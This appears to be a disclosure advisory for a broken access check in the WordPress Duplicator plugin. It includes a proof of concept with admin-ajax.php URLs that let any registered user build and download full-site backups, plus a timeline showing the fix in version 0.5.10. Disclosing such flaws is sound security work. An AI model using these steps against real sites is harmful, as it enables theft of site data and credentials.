Package functions are accessible to every registered users because admin privileges are not checked properly.
So every registered user can create and download backup files.
File: duplicator\duplicator.php
add_action('wp_ajax_duplicator_package_scan', 'duplicator_package_scan');
add_action('wp_ajax_duplicator_package_build', 'duplicator_package_build');
add_action('wp_ajax_duplicator_package_delete', 'duplicator_package_delete');
add_action('wp_ajax_duplicator_package_report', 'duplicator_package_report');Proof of Concept
Login as regular user (created using wp-login.php?action=register) then start scan:
http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_scanAfter that you can build backup:
http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_buildThis function will return json with backup name inside File key.
You can download backup using:
http://wordpress-url/wp-snapshots/%file_name_from_json%Timeline
- 21-11-2014: Discovered
- 21-11-2014: Vendor notified
- 26-12-2014: Version 0.5.10 released, issue resolved
